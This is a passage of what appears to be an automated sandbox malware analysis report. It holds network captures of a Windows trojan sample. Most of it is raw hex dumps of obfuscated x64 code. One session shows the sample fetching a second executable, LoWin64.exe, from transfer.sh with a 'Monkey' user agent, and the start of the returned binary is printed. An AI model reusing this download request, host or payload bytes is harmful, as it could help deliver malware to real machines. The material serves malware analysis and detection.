                            2023-05-14 02:49:54 UTC1488INData Raw: 08 e9 03 00 00 00 4b 1e d6 e9 03 00 00 00 45 bc cf 4d 8b 24 24 e9 07 00 00 00 dc f3 ca b8 14 43 c0 48 8d 64 24 f8 e9 05 00 00 00 14 db e9 e4 4e 48 89 04 24 e9 05 00 00 00 27 fe 9e 94 1f 9f e9 07 00 00 00 cd 2f 3a f6 df 16 56 38 c9 74 07 56 1e 8d a5 e2 be 95 e8 07 00 00 00 49 f1 42 45 5f 5f 5b 48 8d 64 24 08 eb 03 28 d4 b1 9e 58 e9 04 00 00 00 f4 60 fc d0 e9 07 00 00 00 e7 d2 85 6e db af 50 4c 8b ec 49 81 c5 c0 00 00 00 4d 8b 6d 00 eb 03 41 a7 4a 48 8d 64 24 f8 e9 07 00 00 00 37 55 31 e4 8b bf c8 48 89 04 24 9f eb 03 fa d2 64 38 c0 eb 07 64 97 4f 7b 14 c2 2b 74 06 f9 5d 57 27 4e 40 e8 06 00 00 00 71 b7 a7 a0 b3 94 48 83 04 24 25 38 c0 e9 05 00 00 00 81 20 32 67 9d 74 06 a8 84 f5 74 67 b0 c3 63 16 78 47 46 eb 06 20 7a 9a f2 80 d1 9e 58 e9 04 00 00 00 23 80
                            Data Ascii: KEM$$CHd$NH$'/:V8tVIBE__[Hd$(X`nPLIMmAJHd$7U1H$d8dO{+t]W'N@qH$%8 2gttgcxGF zX#
                            2023-05-14 02:49:54 UTC1504INData Raw: f2 ab e6 8c 8b 48 33 c9 eb 07 3a 61 77 42 c3 c6 25 50 9f 38 e4 e9 05 00 00 00 99 53 42 8d 71 74 06 f7 e5 44 cf d4 9a e8 02 00 00 00 3b 76 48 83 c4 08 eb 04 dc 4f c1 5b 9e 58 8a 0f 48 ff c7 50 eb 06 61 72 df b7 ba 34 9f f9 eb 06 ac 66 5a 5e e5 4e 72 07 31 e7 80 e9 54 de 66 e8 06 00 00 00 ea f4 b9 aa 34 4a 48 8d 64 24 08 eb 04 f5 44 9c 1a e9 05 00 00 00 7a 8b e7 6e db 9e 48 8b 04 24 e9 04 00 00 00 57 81 60 2a 48 8d 64 24 08 eb 06 64 40 99 d4 d3 aa 48 33 c0 e9 07 00 00 00 c4 11 7e 85 f5 e7 38 50 e9 02 00 00 00 c0 d8 9f e9 06 00 00 00 17 95 e4 30 b8 e4 f8 e9 04 00 00 00 2b b3 f7 32 73 07 87 ef eb 63 96 49 4d e8 07 00 00 00 ce d1 88 ad bc c0 ec 48 8d 64 24 08 9e 48 8b 04 24 e9 04 00 00 00 ee cc 64 82 48 8d 64 24 08 48 33 db eb 02 3c 76 50 e9 02 00 00 00 ec d2
                            Data Ascii: H3:awB%P8SBqtD;vHO[XHPar4fZ^Nr1Tf4JHd$DznH$W`*Hd$d@H3~8P0+2scIMHd$H$dHd$H3<vP
                            2023-05-14 02:49:54 UTC1520INData Raw: 6a 48 ff c4 38 c9 e9 02 00 00 00 b6 50 74 05 9c 4d db 94 79 48 ff c4 38 e4 eb 06 38 45 e7 2f 36 90 74 05 67 45 ff ae fe 48 ff c4 f8 e9 05 00 00 00 66 20 e0 25 26 73 07 15 54 1c 54 43 21 18 eb 05 88 ff fe 56 8a 9e 48 8b 04 24 eb 04 18 28 94 8d 48 8d 64 24 08 48 81 c1 f0 00 00 00 e9 04 00 00 00 8e d0 aa bb 50 eb 02 74 1a 9f e9 04 00 00 00 5d 43 9b 76 eb 05 8c 86 81 88 da e8 06 00 00 00 3d 4e a2 59 b2 cb 48 83 04 24 18 f8 73 02 e2 57 c3 ff d4 e7 9f 23 59 cb eb 07 84 1f f5 fd 3b 66 cb 9e 48 8b 04 24 eb 06 6c 29 d8 1e 21 9e 48 8d 64 24 08 eb 07 df 3b 29 52 36 51 8f 48 8b 09 51 9d 48 0b c3 e9 05 00 00 00 7e 18 b6 99 9f 48 8d 64 24 f8 48 89 04 24 eb 03 33 17 22 9f f8 eb 04 2e 63 5d 95 73 06 41 73 1a ea 89 74 e8 05 00 00 00 eb d3 31 24 be 48 8d 64 24 08 eb 05 da
                            Data Ascii: jH8PtMyH88E/6tgEHf %&sTTC!VH$(Hd$HPt]Cv=NYH$sW#Y;fH$l)!Hd$;)R6QHQH~Hd$H$3".c]sAst1$Hd$
                            2023-05-14 02:49:54 UTC1536INData Raw: 90 73 06 94 bb 47 76 5c b1 48 ff c4 f9 72 07 e5 43 44 a7 78 25 39 48 ff c4 f8 73 06 26 1e 94 9b bf e0 48 ff c4 eb 06 fb 1c 98 d8 e1 81 48 ff c4 f9 e9 06 00 00 00 21 78 6f c8 32 90 72 02 fd 35 eb 02 c4 99 eb 05 66 bc 6c d5 33 9e 48 8b 04 24 48 8d 64 24 08 eb 04 64 ea 45 39 48 33 c9 8a 0f 48 33 db 48 8b 1c cc 48 ff c7 eb 03 98 a0 1a 50 eb 06 a9 e9 51 da 81 6c 9f e9 04 00 00 00 c5 1d b8 ef 38 c9 74 02 4d c0 e8 06 00 00 00 1b e4 3e be 27 1f 48 ff c4 f8 73 05 b2 d7 7c b8 bd 48 ff c4 38 ff 74 07 cf df a1 4c e7 48 a2 48 ff c4 f9 e9 04 00 00 00 7e 36 a4 93 72 05 ca 22 a6 a2 9f 48 ff c4 38 db 74 06 c1 ed ad 51 ac ae 48 ff c4 f9 e9 07 00 00 00 25 35 7e da 84 cc 66 72 03 6e 32 d2 48 ff c4 f9 eb 04 77 4d d0 a8 72 02 42 49 48 ff c4 38 c0 e9 06 00 00 00 89 ea 26 d7 11
                            Data Ascii: sGv\HrCDx%9Hs&HH!xo2r5fl3H$Hd$dE9H3H3HHPQl8tM>'Hs|H8tLHH~6r"H8tQH%5~frn2HwMrBIH8&
                            2023-05-14 02:49:54 UTC1552INData Raw: 70 00 00 00 00 00 00 00 13 03 03 0b 02 03 1a 03 02 03 03 0e 02 07 0b 48 00 00 00 00 00 00 00 13 03 03 0b 02 03 0b 1a 03 03 0b 03 02 03 03 0e 02 07 0b a0 00 00 00 00 00 00 00 13 03 03 0b 02 03 1a 03 02 03 03 0e 02 07 0b 40 00 00 00 00 00 00 00 13 03 03 0b 02 03 0b 1a 03 03 0b 03 02 03 03 0e 02 07 0b 38 00 00 00 00 00 00 00 13 03 03 0b 02 07 0b 00 00 00 00 00 00 00 00 03 03 0b 03 02 03 03 0e 02 07 0b 30 00 00 00 00 00 00 00 13 03 03 0b 02 07 0b 00 00 00 00 00 00 00 00 03 03 0b 03 02 03 03 0e 02 07 0b 28 00 00 00 00 00 00 00 13 03 03 0b 02 07 0b 00 00 00 00 00 00 00 00 03 02 0b 03 02 03 03 0e 02 07 0b 20 00 00 00 00 00 00 00 13 03 03 0b 02 07 0b 00 00 00 00 00 00 00 00 03 02 0b 03 02 03 03 1c 02 03 0b 1c 0e 03 03 0b 02 03 1c 03 02 03 03 13 02 03 0b 13 0e 03
                            Data Ascii: pH@80(
                            2023-05-14 02:49:54 UTC1568INData Raw: 03 14 10 72 02 00 00 02 03 03 0e 02 07 0b 32 00 00 00 00 00 00 00 13 03 03 0b 02 03 1a 03 02 03 03 1a 02 03 1b 03 02 03 03 1a 02 03 0b 1a 0e 03 03 0b 02 03 1a 03 02 07 03 01 00 00 00 00 00 00 00 02 02 16 03 02 07 20 55 79 2f 40 01 00 00 00 0a 02 03 03 0e 02 07 0b 6a 00 00 00 00 00 00 00 13 03 03 0b 02 03 17 03 02 03 03 0e 02 07 0b 32 00 00 00 00 00 00 00 13 03 03 0b 02 03 16 03 02 07 20 fe 31 01 40 01 00 00 00 02 07 03 c7 e7 2d 40 01 00 00 00 02 07 0b 08 00 00 00 00 00 00 00 10 03 0e 0b 03 03 03 0e 0a 02 03 03 1a 02 03 16 03 02 07 20 88 e6 04 40 01 00 00 00 02 07 03 d2 e7 2d 40 01 00 00 00 02 07 0b 08 00 00 00 00 00 00 00 10 03 0e 0b 03 03 03 0e 0a 02 03 03 1a 02 03 16 03 02 07 20 85 5b 07 40 01 00 00 00 02 07 03 dd e7 2d 40 01 00 00 00 02 07 0b 08 00 00
                            Data Ascii: r2 Uy/@j2 1@-@ @-@ [@-@


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.349708144.76.136.153443C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData
                            2023-05-14 02:51:06 UTC1582OUTGET /get/1h9hjM/LoWin64.exe HTTP/1.1
                            User-Agent: Monkey
                            Host: transfer.sh
                            Connection: Keep-Alive
                            2023-05-14 02:51:07 UTC1582INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 14 May 2023 02:51:07 GMT
                            Content-Type: application/x-ms-dos-executable
                            Content-Length: 1628132
                            Connection: close
                            Cache-Control: no-store
                            Content-Disposition: attachment; filename="LoWin64.exe"
                            Retry-After: Sun, 14 May 2023 04:51:07 GMT
                            X-Made-With: <3 by DutchCoders
                            X-Ratelimit-Key: 127.0.0.1,102.129.143.47,102.129.143.47
                            X-Ratelimit-Limit: 10
                            X-Ratelimit-Rate: 600
                            X-Ratelimit-Remaining: 9
                            X-Ratelimit-Reset: 1684032667
                            X-Remaining-Days: n/a
                            X-Remaining-Downloads: n/a
                            X-Served-By: Proudly served by DutchCoders
                            Strict-Transport-Security: max-age=63072000
                            2023-05-14 02:51:07 UTC1582INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b2 dd c4 44 f6 bc aa 17 f6 bc aa 17 f6 bc aa 17 e2 d7 ae 16 eb bc aa 17 e2 d7 a9 16 e3 bc aa 17 e2 d7 af 16 38 bc aa 17 a4 c9 af 16 d0 bc aa 17 a4 c9 ae 16 e4 bc aa 17 a4 c9 a9 16 fc bc aa 17 e2 d7 ab 16 f3 bc aa 17 f6 bc ab 17 88 bc aa 17 f6 bc aa 17 f7 bc aa 17 92 c6 ae 16 b4 bc aa 17 32 c9 ae 16 f7 bc aa 17 32 c9 aa 16 f7 bc aa 17 32 c9 55 17 f7 bc aa 17 f6 bc 3d 17 f7 bc aa
                            Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$D8222U=
                            2023-05-14 02:51:07 UTC1598INData Raw: a4 6d 3b 71 69 7f 83 7c 24 54 00 9c f9 e9 07 00 00 00 60 ba 93 85 9c b2 98 72 04 2b d7 c9 38 e8 06 00 00 00 b5 da 6b 5a 7f 77 48 8d 64 24 08 9d eb 04 4c bb aa 1a 0f 8c 39 00 00 00 eb 06 7d aa 57 9f e5 94 9c eb 02 ec 11 f9 72 04 3a 36 bd a5 e8 03 00 00 00 e1 b8 32 48 8d 64 24 08 eb 04 49 77 6a e1 9d eb 02 cf d3 c7 44 24 64 01 00 00 00 e9 08 00 00 00 c7 44 24 64 00 00 00 00 83 7c 24 64 00 0f 85 53 00 00 00 33 c0 e9 fa 04 00 00 eb 05 b1 69 fd 84 b7 50 e9 02 00 00 00 15 6a 9f eb 02 b5 d1 f9 72 04 11 21 7c c2 e8 04 00 00 00 ac 55 95 76 48 83 04 24 1c f8 eb 04 bb 29 a4 82 73 04 6f b8 3f c4 c3 3b ed 3b 8b 94 eb 04 f4 ff ef f5 e9 03 00 00 00 62 d4 60 9e 58 33 d2 48 8b 8c 24 b0 00 00 00 e8 b8 bc 01 00 8b 40 0c eb 04 46 6f f8 f7 9c e9 04 00 00 00 d9 22 73 d1 e8 05
                            Data Ascii: m;qi|$T`r+8kZwHd$L9}Wr:62Hd$IwjD$dD$d|$dS3iPjr!|UvH$)so?;;b`X3H$@Fo"s
                            2023-05-14 02:51:07 UTC1614INData Raw: 02 76 de 74 06 51 95 34 a5 5c ac 48 ff c4 f9 eb 06 23 61 5a 1f bb c6 72 04 ee e7 e1 97 48 ff c4 f8 73 03 94 62 df 48 ff c4 9d e9 9e 06 00 00 e9 06 00 00 00 b5 e4 98 e9 c6 dc 48 8d 64 24 f8 eb 03 9f 3a 99 48 89 04 24 9f f8 eb 04 7e de dd 84 73 03 1d 3f 9f e8 04 00 00 00 3a a5 b6 9a 48 83 c4 08 eb 07 a3 2e c3 ea c5 53 2b 9e 58 e9 05 00 00 00 27 ed 14 59 a7 48 c7 44 24 30 00 00 00 00 c7 44 24 28 80 00 00 00 c7 44 24 20 04 00 00 00 45 33 c9 48 8d 64 24 f8 e9 07 00 00 00 dd 6e 97 d2 74 7d 5d 48 89 04 24 e9 04 00 00 00 6f c3 db ef 9f e9 03 00 00 00 73 12 5b f9 eb 07 45 9f 66 28 33 e2 bd 72 07 f7 78 ce aa 8f 6e a3 e8 06 00 00 00 c8 f8 bf 41 92 75 48 83 c4 08 eb 02 e3 5e e9 03 00 00 00 29 c0 a0 9e 58 e9 02 00 00 00 8c d7 eb 06 2e dc f4 77 bc ed 45 33 c0 9c eb 07
                            Data Ascii: vtQ4\H#aZrHsbHHd$:H$~s?:H.S+X'YHD$0D$(D$ E3Hd$nt}]H$os[Ef(3rxnAuH^)X.wE3
                            2023-05-14 02:51:07 UTC1630INData Raw: 82 38 db eb 07 ae cb c4 e7 f2 d0 1c 74 03 a4 bc dc e8 05 00 00 00 ff f9 21 42 5a 48 8d 64 24 08 eb 04 54 45 98 36 e9 02 00 00 00 83 19 9e 58 e9 05 00 00 00 68 58 cc 99 8a 48 8b 04 24 48 ff c0 eb 06 6a 2f e3 33 23 52 50 eb 05 ac de cc ff f2 9f e9 03 00 00 00 ad 56 47 f8 73 05 95 47 c9 4d 84 e8 04 00 00 00 19 a2 95 b3 48 ff c4 f8 73 02 99 d9 48 ff c4 48 ff c4 f8 73 02 4c 7b 48 ff c4 38 c9 e9 05 00 00 00 4f 15 d5 69 53 74 07 c7 cd c9 7f 3b 46 a7 48 ff c4 f9 eb 06 31 db c8 99 ab df 72 07 8c 7c 6d f0 4e 23 32 48 ff c4 f9 eb 03 85 38 fb 72 05 1d b9 f1 d9 aa 48 ff c4 eb 06 76 a3 2d 83 cd 88 48 ff c4 38 db e9 03 00 00 00 64 80 39 74 06 d8 8c da 98 a1 fe eb 06 e7 39 74 3b b2 7e e9 06 00 00 00 f5 7f b5 fe c9 5b 9e 48 8b 04 24 48 8d 64 24 08 e9 06 00 00 00 d7 c0 cc
                            Data Ascii: 8t!BZHd$TE6XhXH$Hj/3#RPVGsGMHsHHsL{H8OiSt;FH1r|mN#2H8rHv-H8d9t9t;~[H$Hd$
                            2023-05-14 02:51:07 UTC1646INData Raw: e9 27 01 00 00 48 8d 64 24 f8 e9 02 00 00 00 ed 6d 48 89 04 24 9f e9 06 00 00 00 6e 58 f0 7c c9 ae e8 07 00 00 00 d8 38 1b c1 ca 18 59 48 83 04 24 20 f9 eb 05 9b 92 67 c0 5f 72 06 d9 d4 be d7 f5 cb c3 49 ba f9 9e 48 8b 04 24 48 8d 64 24 08 33 c0 50 eb 05 f1 f1 25 19 e1 9f eb 02 ae e6 38 c0 e9 05 00 00 00 90 1d 3c d3 44 74 05 32 cd 55 a6 28 e8 07 00 00 00 dd 11 1e 14 26 50 e5 48 83 04 24 22 f9 e9 04 00 00 00 22 ce fd 7e 72 07 49 e1 66 e9 c1 cd 9d c3 ee 61 eb 04 a5 1e 96 9d 9e 58 e9 04 00 00 00 8a d1 12 74 e9 06 00 00 00 ce 50 4f 8a 76 e0 85 c0 0f 85 da fa ff ff 50 9f e9 02 00 00 00 cf 77 f8 e9 04 00 00 00 f7 36 73 b5 73 07 14 62 22 eb 81 67 89 e8 07 00 00 00 ce 3e 57 55 15 c3 a8 48 83 04 24 1e f8 eb 04 75 e0 f4 81 73 04 20 ae 11 58 c3 83 8e 23 32 e9 03 00
                            Data Ascii: 'Hd$mH$nX|8YH$ g_rIH$Hd$3P%8<Dt2U(&PH$""~rIfaXtPOvPw6ssb"g>WUH$us X#2
                            2023-05-14 02:51:07 UTC1662INData Raw: b6 54 24 20 48 8b 4c 24 48 e8 c3 00 00 00 eb 02 5b 1b 48 8d 64 24 f8 e9 03 00 00 00 d4 22 77 48 89 04 24 9f 38 c9 e9 04 00 00 00 70 dd d7 14 74 02 fc 30 e8 03 00 00 00 f7 51 c4 48 83 04 24 12 eb 04 b9 1e d7 7f c3 f4 d0 f4 eb 04 b4 bb 67 ab e9 07 00 00 00 6d 2e e3 cf f3 ff 1d 9e 48 8b 04 24 e9 06 00 00 00 bf 85 ad 19 57 f4 48 8d 64 24 08 e9 03 00 00 00 54 ea 39 48 8b 44 24 48 eb 07 74 25 53 cb 6d 9c 85 50 eb 07 8a ae 48 61 f5 45 e1 9f f9 e9 03 00 00 00 e8 c5 cc 72 03 61 b6 4a e8 02 00 00 00 9c c6 48 83 c4 08 eb 02 55 3c 9e 58 e9 06 00 00 00 f2 78 4e 98 cf e7 eb 04 76 d6 a1 9b e9 05 00 00 00 e9 00 00 00 00 48 83 c4 38 c3 88 54 24 10 48 89 4c 24 08 48 83 ec 28 e9 00 00 00 00 48 8b 4c 24 30 e8 1f 43 00 00 48 8b 44 24 30 e9 05 00 00 00 e9 00 00 00 00 48 83 c4
                            Data Ascii: T$ HL$H[Hd$"wH$8pt0QH$gm.H$WHd$T9HD$Ht%SmPHaEraJHU<XxNvH8T$HL$H(HL$0CHD$0H
                            2023-05-14 02:51:07 UTC1678INData Raw: 7d 43 67 7c 67 72 07 b7 9c 21 cd 3f ea cd 48 ff c4 f9 e9 07 00 00 00 89 11 79 14 f3 13 21 72 04 90 91 6d 62 48 ff c4 38 ff eb 07 2a ef 8a d0 bd 6e 8a 74 05 28 2f f0 2f 6b e9 04 00 00 00 48 7a e2 83 9d e9 04 00 00 00 ec 56 75 6c e9 04 00 00 00 de 18 ed 9c c6 44 24 17 30 c6 44 24 18 38 c6 44 24 19 64 e9 03 00 00 00 3d ad b9 48 8d 64 24 f8 e9 02 00 00 00 dc 3b 48 89 04 24 e9 02 00 00 00 c2 67 9f e9 05 00 00 00 26 cc 83 8e 53 f9 e9 04 00 00 00 24 2f d1 90 72 05 42 34 ba 82 d3 e8 03 00 00 00 4c f2 ad 48 83 04 24 20 f9 e9 03 00 00 00 bb c5 32 72 07 fa 37 aa 79 1b 98 a3 c3 6e cc 4c c4 dc e9 03 00 00 00 a5 45 56 9e 58 e9 02 00 00 00 3a d9 eb 07 13 d3 4f 6f dc 35 8a c6 44 24 1a 20 c6 44 24 1b 25 c6 44 24 1c 64 e9 03 00 00 00 19 9b e9 50 eb 02 ff cf 9f 38 ff e9 07
                            Data Ascii: }Cg|gr!?Hy!rmbH8*nt(//kHzVulD$0D$8D$d=Hd$;H$g&S$/rB4LH$ 2r7ynLEVX:Oo5D$ D$%D$dP8
                            2023-05-14 02:51:07 UTC1694INData Raw: b0 1d 48 ff c4 f9 72 05 ee d7 b8 79 df 48 ff c4 48 ff c4 f9 e9 02 00 00 00 39 a1 72 03 e3 d4 6f 48 ff c4 eb 07 92 9a e3 c2 78 79 64 48 ff c4 38 db eb 02 e4 b3 74 07 d3 db 51 8c d3 7b 5d 48 ff c4 48 ff c4 f9 e9 02 00 00 00 35 f0 72 03 ff 3d a4 e9 05 00 00 00 c5 74 d1 37 92 9e 48 8b 04 24 e9 03 00 00 00 b4 2d 93 48 8d 64 24 08 eb 07 e5 c8 97 24 93 fd 4f e9 07 00 00 00 4c 83 f5 59 7c 1e ee 88 08 48 8d 64 24 f8 eb 06 ec fc f6 69 25 fe 48 89 04 24 e9 06 00 00 00 6f ca 69 24 ac 70 9f 38 e4 74 05 41 98 6c 85 df e8 04 00 00 00 ea f7 63 e5 48 83 04 24 1e f9 eb 04 97 cb 86 9e 72 07 14 d3 e0 bb fa 6e 37 c3 a2 41 92 33 e9 04 00 00 00 ec 99 2a 5d eb 06 4e 20 37 ae f9 ad 9e 58 e9 07 00 00 00 2d a7 d8 9d 74 6e eb eb 03 c5 55 4c e9 37 fc ff ff e9 03 00 00 00 44 27 7e 9c
                            Data Ascii: HryHH9roHxydH8tQ{]HH5r=t7H$-Hd$$OLY|Hd$i%H$oi$p8tAlcH$rn7A3*]N 7X-tnUL7D'~
                            2023-05-14 02:51:07 UTC1710INData Raw: 02 00 00 00 b0 01 c3 4c 89 4c 24 20 44 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 38 83 7c 24 50 00 0f 85 0a 00 00 00 b8 ff ff 00 00 e9 8f 00 00 00 b8 ff ff 00 00 66 89 44 24 20 c7 44 24 24 00 00 00 00 e9 0a 00 00 00 8b 44 24 24 ff c0 89 44 24 24 8b 44 24 50 39 44 24 24 0f 83 5b 00 00 00 8b 44 24 24 48 8b 4c 24 58 8b 04 81 48 8b 4c 24 48 48 03 c8 48 8b c1 48 89 44 24 28 48 83 7c 24 28 00 0f 84 2e 00 00 00 48 8b 54 24 40 48 8b 4c 24 28 e8 f0 f4 ff ff 85 c0 0f 85 17 00 00 00 8b 44 24 24 48 8b 4c 24 60 0f b7 04 41 66 89 44 24 20 e9 05 00 00 00 e9 8d ff ff ff 0f b7 44 24 20 48 83 c4 38 c3 48 89 54 24 10 48 89 4c 24 08 48 81 ec 88 00 00 00 48 c7 44 24 48 00 00 00 00 c7 44 24 50 00 00 00 00 48 8b 8c 24 90 00 00 00 e8 03 fd ff ff 48 89 44 24 58 b8 08 00
                            Data Ascii: LL$ DD$HT$HL$H8|$PfD$ D$$D$$D$$D$P9D$$[D$$HL$XHL$HHHHD$(H|$(.HT$@HL$(D$$HL$`AfD$ D$ H8HT$HL$HHD$HD$PH$HD$X
                            2023-05-14 02:51:07 UTC1726INData Raw: 89 e9 00 00 00 00 48 83 c4 38 c3 88 54 24 10 48 89 4c 24 08 48 83 ec 28 e9 00 00 00 00 48 8b 4c 24 30 e8 f0 cc 03 00 48 8b 44 24 30 e9 05 00 00 00 e9 00 00 00 00 48 83 c4 28 c3 40 57 48 81 ec 20 03 00 00 48 c7 84 24 88 00 00 00 00 00 00 00 c7 44 24 50 17 00 00 c0 48 8d 44 24 54 48 8b f8 33 c0 b9 01 00 00 00 f3 aa 48 8d 94 24 f0 00 00 00 48 8d 4c 24 54 e8 58 cb ff ff 48 8b c8 e8 82 f6 03 00 48 8b c8 e8 61 c5 ff ff 48 89 44 24 78 48 83 7c 24 78 00 0f 85 05 00 00 00 e9 c1 02 00 00 41 b8 08 02 00 00 33 d2 48 8d 8c 24 10 01 00 00 e8 bf b3 ff ff 48 8d 94 24 10 01 00 00 48 8b 4c 24 78 e8 98 cc ff ff 89 44 24 50 83 7c 24 50 00 0f 8c 0d 00 00 00 c7 44 24 58 01 00 00 00 e9 08 00 00 00 c7 44 24 58 00 00 00 00 83 7c 24 58 00 0f 85 05 00 00 00 e9 66 02 00 00 48 8d 8c
                            Data Ascii: H8T$HL$H(HL$0HD$0H(@WH H$D$PHD$TH3H$HL$TXHHaHD$xH|$xA3H$H$HL$xD$P|$PD$XD$X|$XfH
                            2023-05-14 02:51:07 UTC1742INData Raw: cf 9f eb 04 1b b9 cc d7 38 f6 e9 03 00 00 00 9c 7f d8 74 06 8a 4d 27 84 e5 69 e8 05 00 00 00 c7 31 16 75 81 48 83 c4 08 9e 48 8b 04 24 eb 02 18 2d 48 8d 64 24 08 eb 07 39 41 f3 48 2a 3b c1 e8 84 e6 05 00 48 89 44 24 68 eb 05 b8 20 3e 9f 3c 48 8d 64 24 f8 eb 02 71 56 48 89 04 24 eb 06 4b 32 f9 a2 26 38 9f e9 04 00 00 00 e6 25 57 40 f9 72 05 2f 26 e3 dc b3 e8 04 00 00 00 e9 77 c7 ca 48 83 04 24 1e 38 ff e9 02 00 00 00 5f 8e 74 03 43 ac 73 c3 9e 6c 11 8d 34 8f 9e 48 8b 04 24 eb 03 81 1e a9 48 8d 64 24 08 eb 02 91 fa e9 05 00 00 00 51 ed 2a 6b fc 48 8d 84 24 88 00 00 00 eb 05 d8 4f 89 21 5c 48 8d 64 24 f8 48 89 04 24 9f e8 05 00 00 00 be b1 f0 d8 9d 48 ff c4 e9 07 00 00 00 3a c6 a2 27 9d 33 21 48 ff c4 f9 e9 05 00 00 00 9a 7f fb 2f e6 72 06 86 6a db b6 95 9c
                            Data Ascii: 8tM'i1uHH$-Hd$9AH*;HD$h ><Hd$qVH$K2&8%W@r/&wH$8_tCsl4H$Hd$Q*kH$O!\Hd$H$H:'3!H/rj
                            2023-05-14 02:51:07 UTC1758INData Raw: 03 00 00 00 d0 46 e5 74 05 e6 fd b3 3b b5 e8 02 00 00 00 f2 b3 48 ff c4 eb 03 8c 28 b0 48 ff c4 38 db e9 03 00 00 00 5b 8f e2 74 07 5d c4 4f d1 11 4e 94 48 ff c4 eb 02 44 9e 48 ff c4 f8 e9 02 00 00 00 8d 2d 73 06 71 1f 76 1b fe a7 48 ff c4 f9 eb 02 35 39 72 04 75 a8 81 f2 48 ff c4 48 ff c4 f9 e9 03 00 00 00 eb 86 5c 72 02 66 1a 48 ff c4 f8 eb 05 7e 33 b9 81 cf 73 05 95 88 92 5e 92 eb 03 ba 37 52 9d eb 06 58 bd 52 92 bb d1 eb 06 fc 73 d7 8b 76 4a 4c 8b 84 24 90 00 00 00 e9 07 00 00 00 39 9d a2 36 3d 54 d3 50 eb 04 46 3a c2 b8 9f eb 02 6b a5 38 d2 eb 07 44 4a e5 33 99 9b cd 74 03 b0 d6 93 e8 07 00 00 00 90 4a 77 80 41 e3 6a 48 8d 64 24 08 e9 02 00 00 00 58 23 9e 48 8b 04 24 48 8d 64 24 08 eb 04 19 66 68 c7 eb 05 5d 1f 38 a9 db 48 8b d0 eb 07 5d 66 a3 a8 42
                            Data Ascii: Ft;H(H8[t]ONHDH-sqvH59ruHH\rfH~3s^7RXRsvJL$96=TPF:k8DJ3tJwAjHd$X#H$Hd$fh]8H]fB
                            2023-05-14 02:51:07 UTC1774INData Raw: 7c 25 d0 48 8b 44 24 30 e9 64 00 00 00 33 c0 e9 02 00 00 00 b7 3a 48 8d 64 24 f8 e9 04 00 00 00 4f 15 58 94 48 89 04 24 eb 07 70 f7 68 7b 8e 4e 44 9f f8 e9 03 00 00 00 d7 1f f3 73 06 89 62 63 68 a6 f7 e8 04 00 00 00 33 95 b0 2d 48 83 c4 08 9e 58 e9 06 00 00 00 db 1e ef eb 1f 65 e9 05 00 00 00 9e ba fc 8f 2e e9 05 00 00 00 e9 00 00 00 00 48 83 c4 48 c3 44 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 e9 ab 00 00 00 eb 03 7c 55 c1 9c 38 db 74 07 21 32 be fb cc c3 35 e8 02 00 00 00 1e 8b 48 ff c4 38 db e9 04 00 00 00 4f 75 5e 42 74 05 2c d7 ba 22 47 48 ff c4 e9 03 00 00 00 95 1c 26 48 ff c4 f9 e9 04 00 00 00 e9 f2 bd 5c 72 03 f9 3c 34 48 ff c4 e9 03 00 00 00 f9 32 cb 48 ff c4 f8 73 06 1a fd dd c2 1f cb 48 ff c4 f9 e9 03 00 00 00 c0 74 73 72 04 db 51
                            Data Ascii: |%HD$0d3:Hd$OXH$ph{NDsbch3-HXe.HHDD$HT$HL$H(|U8t!25H8Ou^Bt,"GH&H\r<4H2HsHtsrQ
                            2023-05-14 02:51:07 UTC1790INData Raw: 6e 69 eb 03 8e 40 8f e9 00 00 00 00 48 83 c4 60 5f c3 4c 89 44 24 18 89 54 24 10 89 4c 24 08 57 48 83 ec 60 e9 5d 00 00 00 eb 07 65 79 33 8c 1e 1e 26 50 eb 06 15 d9 b9 3c 7e c1 9f e8 04 00 00 00 79 d0 42 d9 48 83 04 24 1d f8 e9 02 00 00 00 8a 1d 73 02 6d ca c3 9d 93 dc 2f f3 ae a5 e9 06 00 00 00 c3 28 e3 5d cd 42 9e 48 8b 04 24 e9 02 00 00 00 5a 7e 48 8d 64 24 08 eb 02 90 49 e9 03 00 00 00 ad 1d 16 48 8d 44 24 20 48 8b f8 33 c0 b9 01 00 00 00 f3 aa 48 8d 54 24 44 48 8d 64 24 f8 48 89 04 24 eb 06 75 59 21 ea a7 36 9f e9 03 00 00 00 4d b5 c3 f8 eb 04 b7 d3 2a f1 73 02 bd c3 e8 07 00 00 00 ed 87 41 b3 62 fb 54 48 83 c4 08 e9 04 00 00 00 2b ec f9 97 eb 02 cc 25 9e 58 e9 03 00 00 00 76 18 58 48 8d 4c 24 20 eb 07 31 78 e3 7a 76 f9 31 9c e9 06 00 00 00 bc 5b 9e
                            Data Ascii: ni@H`_LD$T$L$WH`]ey3&P<~yBH$sm/(]BH$Z~Hd$IHD$ H3HT$DHd$H$uY!6M*sAbTH+%XvXHL$ 1xzv1[
